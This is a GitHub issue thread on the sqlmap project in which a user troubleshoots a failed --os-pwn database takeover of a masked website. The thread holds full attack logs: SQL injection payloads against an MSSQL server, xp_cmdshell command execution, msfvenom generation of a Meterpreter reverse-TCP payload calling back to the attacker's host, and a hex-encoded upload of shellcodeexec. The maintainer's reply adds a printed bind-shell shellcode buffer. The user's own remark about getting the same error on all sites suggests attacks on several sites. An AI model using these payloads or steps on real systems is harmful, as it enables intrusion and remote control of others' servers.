search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
32.66k stars 5.73k forks source link

failed to create the shellcode #2372

Closed aliyazal closed 7 years ago

aliyazal commented 7 years ago

Metasploit version: Framework: 4.13.16-dev-d48ec09 Console : 4.13.16-dev-d48ec09

Sqlmap last version

root@myCloud:~/sqlmap# python sqlmap.py -u "**" -v3 --thread=10 --os-pwn --msf-path /root/metasploit-framework/

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:15:50

[20:15:50] [DEBUG] cleaning up configuration parameters [20:15:50] [DEBUG] setting the HTTP timeout [20:15:50] [DEBUG] creating HTTP requests opener object [20:15:50] [DEBUG] setting the takeover out-of-band functionality [20:15:50] [DEBUG] provided Metasploit Framework path '/root/metasploit-framework' is valid [20:15:51] [INFO] resuming back-end DBMS 'microsoft sql server' [20:15:51] [DEBUG] resolving hostname 'www.***.com' [20:15:51] [INFO] testing connection to the target URL [20:15:51] [DEBUG] declared web page charset 'utf-8' [20:15:51] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS sqlmap resumed the following injection point(s) from stored session:

Parameter: tips (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tips=25' AND 6411=6411 AND 'yIGb'='yIGb&page=2 Vector: AND [INFERENCE]

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: tips=25' AND 3406 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3406=3406) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(107)+CHAR(113))) AND 'qMiX'='qMiX&page=2
Vector: AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: tips=25';WAITFOR DELAY '0:0:5'--&page=2
Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
Payload: tips=25' WAITFOR DELAY '0:0:5'--&page=2
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

[20:15:51] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5 back-end DBMS: Microsoft SQL Server 2008 how do you want to establish the tunnel? [1] TCP: Metasploit Framework (default) [2] ICMP: icmpsh - ICMP tunneling

1 [20:17:52] [DEBUG] going to use 'C:/Program Files (x86)/Parallels/Plesk/Databases/MSSQL/MSSQL10_50.MSSQLSERVER/MSSQL/Log' as temporary files directory [20:17:52] [INFO] testing if current user is DBA [20:17:52] [DEBUG] resuming configuration option 'code' (200) [20:17:52] [DEBUG] performed 0 queries in 0.01 seconds [20:17:52] [DEBUG] creating a support table to write commands standard output to [20:17:52] [PAYLOAD] 25';DROP TABLE sqlmapoutput-- [20:17:53] [WARNING] reflective value(s) found and filtering out [20:17:53] [PAYLOAD] 25';CREATE TABLE sqlmapoutput(id INT PRIMARY KEY IDENTITY, data NVARCHAR(4000))-- [20:17:53] [INFO] testing if xp_cmdshell extended procedure is usable [20:17:53] [PAYLOAD] 25';DECLARE @chss VARCHAR(8000);SET @chss=0x6563686f2031;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @chss-- [20:17:53] [PAYLOAD] 25' AND 3109 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(113)+(SELECT ISNULL(CAST(COUNT(data) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput)+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(107)+CHAR(113))) AND 'eFUO'='eFUO [20:17:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) [20:17:54] [INFO] the SQL query used returns 1 entries [20:17:54] [PAYLOAD] 25' AND 2551 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(113)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM sqlmapoutput WHERE id NOT IN (SELECT TOP 0 id FROM sqlmapoutput ORDER BY id) ORDER BY id)+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(107)+CHAR(113))) AND 'DMmn'='DMmn [20:17:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) [20:17:54] [DEBUG] performed 2 queries in 0.48 seconds [20:17:54] [PAYLOAD] 25';DELETE FROM sqlmapoutput-- [20:17:54] [INFO] xp_cmdshell extended procedure is usable [20:17:54] [INFO] creating Metasploit Framework multi-stage shellcode which connection type do you want to use? [1] Reverse TCP: Connect back from the database host to this machine (default) [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535 [3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP [4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS [5] Bind TCP: Listen on the database host for a connection 2 what is the local address? [Enter for '10.2.10.133' (detected)] which local port number do you want to use? [48324] which payload do you want to use? [1] Meterpreter (default) [2] Shell [3] VNC 1 [20:21:26] [DEBUG] executing local command: /root/metasploit-framework/msfvenom -p windows/meterpreter/reverse_tcp_allports EXITFUNC=process LPORT=48324 LHOST=10.2.10.133 -a x86 -e x86/alpha_mixed -f raw BufferRegister=EAX > "/root/.sqlmap/output/www.*.com/tmpmjjcj" [20:21:26] [INFO] creation in progress . quit unexpectedly with return code 1

[20:21:27] [CRITICAL] failed to create the shellcode (/usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/spec_set.rb:87:in block in materialize': Could not find rake-12.0.0 in any of the sources (Bundler::GemNotFound) from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/spec_set.rb:80:inmap!' from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/spec_set.rb:80:in materialize' from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/definition.rb:176:inspecs' from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/definition.rb:235:in specs_for' from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/definition.rb:224:inrequested_specs' from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/runtime.rb:118:in block in definition_method' from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/runtime.rb:19:insetup' from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler.rb:100:in setup' from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/setup.rb:20:in<top (required)>' from /usr/local/rvm/rubies/ruby-2.1.8/lib/ruby/site_ruby/2.1.0/rubygems/core_ext/kernel_require.rb:133:in require' from /usr/local/rvm/rubies/ruby-2.1.8/lib/ruby/site_ruby/2.1.0/rubygems/core_ext/kernel_require.rb:133:inrescue in require' from /usr/local/rvm/rubies/ruby-2.1.8/lib/ruby/site_ruby/2.1.0/rubygems/core_ext/kernel_require.rb:40:in require' from /root/metasploit-framework/config/boot.rb:26:in<top (required)>' from /usr/local/rvm/rubies/ruby-2.1.8/lib/ruby/site_ruby/2.1.0/rubygems/core_ext/kernel_require.rb:55:in require' from /usr/local/rvm/rubies/ruby-2.1.8/lib/ruby/site_ruby/2.1.0/rubygems/core_ext/kernel_require.rb:55:inrequire' from /root/metasploit-framework/lib/msfenv.rb:12:in <top (required)>' from /usr/local/rvm/rubies/ruby-2.1.8/lib/ruby/site_ruby/2.1.0/rubygems/core_ext/kernel_require.rb:55:inrequire' from /usr/local/rvm/rubies/ruby-2.1.8/lib/ruby/site_ruby/2.1.0/rubygems/core_ext/kernel_require.rb:55:in require' from /root/metasploit-framework/msfvenom:10:in

' )

** [20:21:27] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 2 times

stamparm commented 7 years ago

This is a problem of the Metasploit installation. To debug it, try to run something like:

# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -f c
No encoder or badchars specified, outputting raw payload
Payload size: 299 bytes
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x0b\x59\x50\xe2\xfd\x6a\x01\x6a"
"\x02\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89"
"\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x85\xc0\x75"
"\x58\x57\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1"
"\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x6a\x00\x6a\x04"
"\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x2d\x8b"
"\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
"\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f"
"\xff\xd5\x83\xf8\x00\x7e\x07\x01\xc3\x29\xc6\x75\xe9\xc3";

I guess that you'll have problems with it too (because of bad Metasploit/Ruby installation) and until you'll sort it out, you'll have problems with sqlmap too

aliyazal commented 7 years ago

my this problem solved. But I get same error on all site.

current user is DBA: True ERROR: [03:48:38] [DEBUG] executing local command: /root/metasploit-framework/msfvenom -p windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=23121 LHOST=10.2.83.75 -a x86 -e x86/alpha_mixed -f raw BufferRegister=EAX > "/root/.sqlmap/output/www.x.com/tmpmjuno" [03:48:38] [INFO] creation in progress .................. done [03:48:56] [DEBUG] the shellcode size is 360 bytes [03:48:56] [INFO] uploading shellcodeexec to 'C:/Program Files (x86)/Parallels/Plesk/Databases/MSSQL/MSSQL10_50.MSSQLSERVER/MSSQL/Log/tmpsejuno.exe' [03:48:56] [DEBUG] going to upload the file 'binary' with stacked query SQL injection technique [03:48:56] [INFO] using PowerShell to write the binary file content to file 'C:\Program Files (x86)\Parallels\Plesk\Databases\MSSQL\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmpsejuno.exe' [03:48:56] [DEBUG] uploading the base64-encoded file to C:\Program Files (x86)\Parallels\Plesk\Databases\MSSQL\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmpfqtvd.txt, please wait.. [03:48:56] [PAYLOAD] 25';DECLARE @pjec VARCHAR(8000);SET @pjec=0x6563686f205456715141414d4141414145414141412f2f3841414c6741414141414141414151414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414138414141414134667567344174416e4e49626742544d30685647687063794277636d396e636d467449474e68626d3576644342695a534279645734676157346752453954494731765a4755754451304b4a41414141414141414142644a4a6172475558342b426c462b50675a52666a34506f4f442b4274462b50672b67356234474558342b4436446866675952666a34506f4f562b4131462b50675150577634476b58342b426c462b66677a52666a34506f4f4a2b4268462b50672b67344434474558342b464a705932675a52666a3441414141414141414141414141414141414141414141414141414141414141415545554141457742424143674b65525641414141414141414141446741414d42437745494141414b414141414367414141414141414f41544141414145414141414341414141414151414141454141414141494141415141414141414141414142414141414141414141414155414141414151414145627a41414144414141414141415141414151414141414142414141424141414141414141415141414141414141414141414141414330495141415041414141414241414143734151414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414451494141415141414141414141414141414141414141434141414c4141414141414141414141414141414141414141414141414141414141414141414141414175644756346441414141464949414141414541414141416f41414141454141414141414141414141414141414141414167414142674c6e4a6b5958526841414353425141414143414141414147414141414467414141414141414141414141414141414141514141415143356b595852684141414178414d41414141774141414141674141414251414141414141414141414141414141414141454141414d4175636e4e7959774141414b77424141414151414141414149414141415741414141414141414141414141414141414142414141424141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141203e3e2022433a5c50726f6772616d2046696c65732028783836295c506172616c6c656c735c506c65736b5c4461746162617365735c4d5353514c5c4d5353514c31305f35302e4d5353514c5345525645525c4d5353514c5c4c6f675c746d7066717476642e74787422;EXEC master..xp_cmdshell @pjec-- [03:48:57] [CRITICAL] page not found (404) [03:48:57] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 2 times, 500 (Internal Server Error) - 971 times [03:48:57] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)

stamparm commented 7 years ago

You have 500 (Internal Server Error) - 971 times and raising the issue :). Please, don't make this kind of issues anymore. Too many 500s means that you should inspect what's going on the web side, not sqlmap's side